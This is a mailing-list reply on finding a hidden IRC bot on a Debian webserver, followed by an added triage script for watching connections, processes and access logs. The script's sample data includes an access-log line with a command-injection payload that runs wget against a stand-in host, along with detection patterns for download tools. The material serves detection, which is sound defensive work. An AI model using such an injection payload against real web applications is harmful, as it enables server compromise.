Fran wrote:
> I've been told by my ISP that my sarge webserver (only port 80 open, all
> software up to date) is spewing traffic they're calling IRC_nick, which
> is apparently some sort of IRC bot.
>
> I'm unable to locate the file/files that are infected. Additionally, I
> can't see the process/processes for the bot when it's running.
>
> chkproc -v does reveal some hidden procs, but before I can kill them,
> they seem to go away.
>
> chkrootkit/rkhunter don't seem to see anything either.
>
> Any other suggestions?

Use tcpdump and/or ethereal to check traffic.
Check apache logs. You may see some STDOUT from wget there, if they broke in using a vulnerability in some web app.

Watch lsof or netstat for ESTABLISHED connections. Use 1s watch frequency.

Use top/htop with high refresh frequency. Note unusual short-lived processes. Try locating their binaries or scripts. /tmp most likely.

HTH,
aru-nas
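The watch-and-grep triage steps above, as an added shell example that is not part of the thread: it assumes `netstat -tnp`, `ps -eo pid,comm,args` and a combined-format apache access log, and the sample data at the bottom is constructed (documentation IP ranges, invented PIDs).

```shell
#!/bin/sh
# Added example (not from the thread). Each filter reads command output on
# stdin, so it works on the constructed samples below or on live
# `netstat -tnp`, `ps -eo pid,comm,args` and access.log output.
# ESTABLISHED TCP sessions: remote endpoint and owning PID/program.
# netstat -tnp columns: Proto Recv-Q Send-Q Local Foreign State PID/Program
established_connections() {
  awk '$6 == "ESTABLISHED" { print $5, $7 }'
}

# Processes whose binary lives in /tmp or /dev/shm, or was unlinked after
# start ("(deleted)"), from `ps -eo pid,comm,args`; header line skipped.
suspicious_procs() {
  awk 'NR > 1 && ($3 ~ /^\/(tmp|dev\/shm)\// || $0 ~ /\(deleted\)/) { print $1, $3 }'
}

# Access-log requests carrying a wget/curl command; exits 0 on no match.
download_requests() {
  grep -iE 'wget|curl' || true
}

# Lines of snapshot $2 absent from snapshot $1 (only newly seen entries).
new_entries() {
  grep -vxF -f "$1" "$2" || true
}

# Live 1s watch: prints each ESTABLISHED session the first time it appears.
# Not run by this demo; stop with Ctrl-C.
watch_established() {
  prev=$(mktemp); cur=$(mktemp)
  while :; do
    netstat -tnp 2>/dev/null | established_connections > "$cur"
    new_entries "$prev" "$cur"
    mv "$cur" "$prev"; sleep 1
  done
}

# Constructed sample output (documentation IP ranges, invented PIDs).
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.0.2.10:80 198.51.100.7:51234 TIME_WAIT -
tcp 0 0 192.0.2.10:39812 203.0.113.5:6667 ESTABLISHED 4242/httpd'
SAMPLE_PS='PID COMMAND COMMAND
1 init /sbin/init
4242 httpd /tmp/.x/httpd -c /tmp/.x/conf'
SAMPLE_LOG='198.51.100.7 - - [01/Jan/2006:10:00:00 +0000] "GET /index.php?cmd=wget%20http://203.0.113.9/x HTTP/1.1" 200 512
198.51.100.8 - - [01/Jan/2006:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024'
printf '%s\n' "$SAMPLE_NETSTAT" | established_connections   # 203.0.113.5:6667 4242/httpd
printf '%s\n' "$SAMPLE_PS" | suspicious_procs               # 4242 /tmp/.x/httpd
printf '%s\n' "$SAMPLE_LOG" | download_requests             # the cmd=wget request
```

For a live run, call `watch_established` in one terminal and `ps -eo pid,comm,args | suspicious_procs` in another; a PID that shows up in both is the one to inspect under /proc before it exits.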